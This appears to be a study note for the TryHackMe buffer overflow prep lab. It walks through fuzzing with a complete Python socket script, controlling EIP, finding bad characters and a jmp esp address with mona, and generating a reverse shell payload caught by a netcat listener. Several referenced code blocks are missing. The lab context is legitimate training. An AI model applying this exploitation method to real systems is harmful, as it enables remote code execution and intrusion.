BOF - Tib3rius

Trib3rius: https://tryhackme.com/room/bufferoverflowprep

1- Mona Configuration

First the first, you can set up mona module

!mona config -set workingfolder c:\mona\%p

2- Fuzzing

Create a file on your Kali box called fuzzer.py with the following contents:

#!/usr/bin/env python3

import socket, time, sys

ip = "10.10.202.33"

port = 1337
timeout = 5
prefix = "OVERFLOW1 "

string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)
  except:
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)

We can see that the application crashed at the 2000 bytes. On immunity debugger, "Access Violation when executing 41414141"

Make sure to restart application every steps.

3- Crash Replication & Controlling EIP

Create another file on your Kali box called exploit.py with the following contents:

β€’ Generate offset with length 400 bytes longer that the crashed string.

β€’ Copy the output and place it into the payload variable of exploit.py script.

Once we executed the script, the application will be crashed again.

Once the application crashed, we can run mona command on the same length as the pattern we created.

The output should be like:

β€’ let update our payload script and set the offset variable to the value (offset 1978) previously set to 0.

β€’ Set the payload variable to empty.

β€’ Set the retn variable to β€œBBBB”.

We can run the exploit.py script again and the EIP register should be overwritten with 4 B's (42424242).

4- Finding Bad Characters

Generate a bytearray using mona and exclude null byte \x00. The location bytearray.bin file will be in C:\mona\oscp\bytearray.bin.

Now, we need to generate string of bad chars by python3 script

β€’ Update exploit.py script by set the payload variable to the string of bad chards.

Once the application crashed, we can compare the address to which the ESP register points by mona command:

Note that all of these might not be badchars! We need to remove one by one and \x00 by default will be badchars.

We can run mona command to generate new bytearray.bin again and remove badchars on our exploit.py script.

Then we can perform comparison again with the same step with different ESP value.

We remove badchars one by one and compare until we reach to Unmodified status.

5- Finding a Jump Point

Let finds all "jmp esp" instructions with address that don't contain any of the badchars specified. (Log Data)

β€’ choose an address with status "False". Set the value of address to β€œretn” variable with backwards (little endian) β€’ example 0x625011af = \xaf\x11\x50\x62

6- Generate Payload

Generate reverse shell payload with specify badchars -b options

β€’ Copy C code strings and set value on payload variable

7- Prepend NOPs

We need to add some space in memory for payload. We can add padding variable to 16 or more β€œNo Operation” (\x90) bytes:

8- Exploit

Let start netcat listener on port 4444 and execute python script.

PreviousBuffer OverflowNextBOF - TCM

Last updated